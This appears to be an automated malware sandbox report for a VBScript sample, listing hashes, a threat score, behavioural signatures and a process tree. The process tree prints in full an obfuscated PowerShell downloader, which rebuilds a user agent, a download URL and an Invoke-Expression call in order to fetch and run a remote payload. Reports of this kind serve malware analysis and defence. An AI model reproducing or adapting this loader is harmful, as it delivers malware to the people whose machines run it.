Overview

overview

10

Static

static

1

birectangular.vbs

windows7-x64

8

birectangular.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    03-07-2024 05:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    birectangular.vbs

  • Size

    413KB

  • MD5

    be6f44242b4afd0e61d775b9ef7946b0

  • SHA1

    80ce71becc7fb1203a43708d7e3fdcad778bb79e

  • SHA256

    8175ce9634dcd8deb29e81ae2f070d4b2f43ae2b4d154946a251ac93f1e87b59

  • SHA512

    e1778509074b9aad5fbc7de0947b887816c6f0308b4a347f181eb0dc92008125f7ef1b55184187d7c9cd99a6dfabb82ef858839cefa1185e1016ba0c3d45ba86

  • SSDEEP

    6144:Ps58yYxqthfv2vF5aa++uQ8YTbBrD0Dz1EhMqcwu+T7wtVuqo41SqW8ZdbU8se0s:GMZcfqHmfRpcLnkd

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 63 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\birectangular.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Shoo: DamTKvldlP.tpsmorp1Unde2U.de ');$Skumredes=$Methodizing[0];$Asprout= (Jimmis 'ps,u$ ffgSpidlStiroBrasbAdozaRudilPa t:,espNCh pyS ydk iltr Me iAutot enpiN nnkGlobkUpcueR llrfor nE.iceDjuks Non=CataNSouteDksdwU og- eneOTeleb,egejTh seTarmc bu.tint, medlSDropyGirss.athtOpree,hormRock..ritNIridetroutModi.SengWKopieBeskbPrinCGiftl ,eri.yvteColin .nit');$Asprout+=$Myoplastic[1];Fluorideringen ($Asprout);Fluorideringen (Jimmis 'Sa.f$ EndNTidsyretskAu,irTykmiDesttUddaiemptkDybfkBoureNatirAfp,nDdedeInkls R,a.CaboHrodneno,taBlomdvac e BikrK,desAloe[ Lin$CalaN .eceBillu Konr.mbroTrykcPoliaCruenShamaVamplUnac1Iglo5Yaff1 Red]Peri=F,de$M,noH Co.oAzoro Au.spapieUntagCystoRverwMaci ');$Antilogical=Jimmis 'Nedl$ RakN Prey ,opktallrGadeiKonstVer iApatkSatsk uleOverrNontnKodeeInussBlou. In DGrafoSchww Rumn El l AfrogallaDen.d.aasFStr,iDis lCupeeUdrj(Tas,$Mo,lSCrumk K.vuHy,omKo,mrAgnoeTripdR steRandsCa.a,Mi.j$Coypt Lany AponFlokgFloweDyn.nPlind CareUnbo)S mp ';$tyngende=$Myoplastic[0];Fluorideringen (Jimmis 'Dagk$ChargH,rrlSprioklepb Bega SublJ.mb:beskBRevid scrl Beledgn rSamasDeci=Egen(Ha,fTPrikeOversSku,tIndh-bimaPV riaTurrtNycthL no Natu$ Prit PreyAgisnPladg ntie EurnPantdKnageBags) Vrl ');while (!$Bdlers) {Fluorideringen (Jimmis 'None$ U sgAffelBoploPsylbPengaBrunlHand: sabSGre,y killSanstDelae E.stStilj RhosAf.rk,agdr Udeu Bu.kImpukPraceTopm=Timb$TarptPog,rCoulust te.rbi ') ;Fluorideringen $Antilogical;Fluorideringen (Jimmis ' BarSOph.tHy,eaMangrAvertCh.r-TotaSCitrl.axieAfkleBadmpn,na Hove4Afha ');Fluorideringen (Jimmis ' Hyd$Convg Haal minoMultbK nta ucllAbno:rummBOutfdFortl TroeSkumrBlgesDist=Midt(AltsTKna.eGenisVeritBall-PatePToe.aNonmtTolkh Ri. .tvb$Sndet,epeyHal.nUrogg Forese snSvovdCradeS.bs)Inha ') ;Fluorideringen (Jimmis 'Stok$ etrgSucclSindo TigbRustaR nglA.ph:FiskGExter JetaVa,mm LaimTaleaspart UngePhoss.toc=drug$WishgJ.hnlTyveoBefubFen.a pojlSial:.kvaASu anUr,isKonft DertAuslemrkelMoh.sMe,heSy esDrn oKosmm RecrSl,daAt.laUnmidSno,eBa mtuds.sDepo+Co y+H,pa% Tri$AfmaMFre eEjentDog h DetoTr.ndSaltiHo,sz OmgiSwinnMortg ,il.DelecVaeroDetau Ye.nSquatVan ') ;$Skumredes=$Methodizing[$Grammates];}$Marmorgulvenes=308881;$Renhedsgraders=29541;Fluorideringen (Jimmis ' The$Arbeg Nu,l Jugo.rombHyloa Stol Cou:,riaSAadscTochynu hp.raph xoiReplfUdadoEnerrBattmArnk2Barn4Bra,5Af,a ,aug= For iliGKokuesttttBary-Kon CSvinoFejln Spit TreeumaanTvant Ind Beto$LinitMajoyOparnTordgE uieBannnStvld,etheSeis ');Fluorideringen (Jimmis ' Meg$AcclgKerblTrepo EnsbClinaHvidltrac:TeknUSillnDe,iaHa,pn,ejltUnliiT,syqSa,iuArenaAbr,tGenneTurvd Scl Mist= Alk pre,[ SegS Foly,abesFlyvt,ulpeSlagm.arj.CaddCPitcoSolbnRerov IndeUnh rLactt ira] Win: ete:FrakFD.ifrChi oM.ngmQuipBHypoa LilsRedhe St,6Sous4SlapSBnhrtTromr K riPropnAstigScus( Waa$H liSHou,cEtagyStnkpTheahFolkiIa,rfknudoProprAfgimSer,2Genn4Sp.r5Krum) Fri ');Fluorideringen (Jimmis 'Trip$StargRep,lOveroTylsbbesta UnplCoal:DigyBbrusoIn knBlreaass,iUnecrRusseTokr Ste.=Kili Mod[VirkS Ga,yImpusHypstGrfberelimElod. SutTFasaeS.atxu dat,jer.archEDogmnSlapc .inoPiledS.ggiFuninSmmegPh.s]Steg: ns: creAFakeSMalvCSn wI MetI m n.pos GEtagearchtUmidS engtAnstrAfskiCivinFilogRe a(Kerm$.ehjU.phenTonia AranTubat Da,iKl iqFondu heraA.amtDataeEnked ,or)Morb ');Fluorideringen (Jimmis 'Sulp$CestgPolylImmeoi.vobDiska Brul F.n:Hv,dP Bi.rresaiph,toOsterHicciRejet Srge StatSlidsForphL beaDetovUnevePigerSkleeJgernfaddsSk,a= Su.$UnwaBDev oAlarnprogaSpliiProtrMoldeRe.u.TrfssShapu I tbDeposTak tforbrVid i SphnGaargcor.(Harp$ ,erMAnneaWomarUnchm S.goForjrPedigFr,nuImpulFiscvkommeMellnPen eUr ts M.d,schm$MythRGentehus n arihfibeetjredVrngsGunsgNormrH.lba kardMo meWorkr Saus S.u)nabo ');Fluorideringen $Prioritetshaverens;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2992
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
        3⤵
          PID:2756

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2992-21-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2992-22-0x000000001B620000-0x000000001B902000-memory.dmp
      Filesize

      2.9MB

      Download
    • memory/2992-24-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-23-0x0000000001E90000-0x0000000001E98000-memory.dmp
      Filesize

      32KB

      Download
    • memory/2992-25-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-26-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-28-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-27-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-29-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-30-0x000007FEF5ACE000-0x000007FEF5ACF000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2992-31-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download
    • memory/2992-32-0x000007FEF5810000-0x000007FEF61AD000-memory.dmp
      Filesize

      9.6MB

      Download